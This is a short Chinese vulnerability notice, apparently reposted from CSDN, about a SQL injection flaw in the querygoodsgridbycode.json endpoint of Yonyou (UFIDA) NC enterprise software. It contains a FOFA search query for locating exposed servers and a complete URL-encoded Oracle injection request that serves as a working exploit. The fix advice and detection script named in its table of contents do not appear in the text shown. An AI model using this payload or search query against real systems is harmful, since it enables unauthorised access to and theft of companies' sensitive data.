文章目录
0x00 漏洞描述
0x01 测绘工具
0x02 漏洞复现
0x03 核检测脚本
0x04 修复建议
0x05 免责声明
0x00 漏洞描述
用友NC是用友为大型企业、集团公司开发的系列管理软件产品。该系列产品基于全球最新的互联网、云计算、移动应用技术,旨在帮助企业创新管理模式,引领业务变革。用友NC querygoodsgridbycode.json接口存在SQL注入漏洞,攻击者可利用该漏洞获取敏感数据。
0x01 测绘工具
fofa: app=“用友-用友-NC”
0x02 漏洞复现
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28116%29%7C%7CCHR%28101%29%7C%7CCHR%28115%29%7C% 7CCHR%28116%29%7C%7CCHR%2849%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C% 7CCHR%2850%29%7C%7CCHR%28116%29%7C%7CCHR%28101%29%7C%7CCHR%28115%29%7C%7CCHR%28116%29%29–+dpxi HTTP/1.1
主机:
#UFIDA NC querygoodsgridbycode 以上前端SQL注入漏洞信息来源于互联网,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93981.html
